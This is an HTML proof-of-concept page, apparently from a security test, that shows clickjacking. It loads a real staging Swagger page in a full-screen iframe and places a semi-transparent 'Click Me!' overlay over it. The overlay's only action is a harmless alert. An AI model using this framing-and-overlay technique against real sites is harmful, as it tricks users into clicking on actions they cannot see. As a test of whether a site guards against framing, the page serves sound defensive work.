<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clickjacking Example</title>
    <style>
        /* Make the iframe fill the screen */
        iframe {
            width: 100%;
            height: 100%;
            border: none;
            position: absolute;
        }

        /* Add a transparent overlay to trick users into clicking */
        .overlay {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 200px;
            height: 50px;
            background-color: rgba(255, 0, 0, 0.5);
            color: white;
            text-align: center;
            font-size: 20px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="overlay" onclick="alert('This could trigger a harmful action!')">
        Click Me!
    </div>

    <iframe src="https://rls-stg.congacloud.io/api/localization/swagger/index.html" />
</body>
</html>
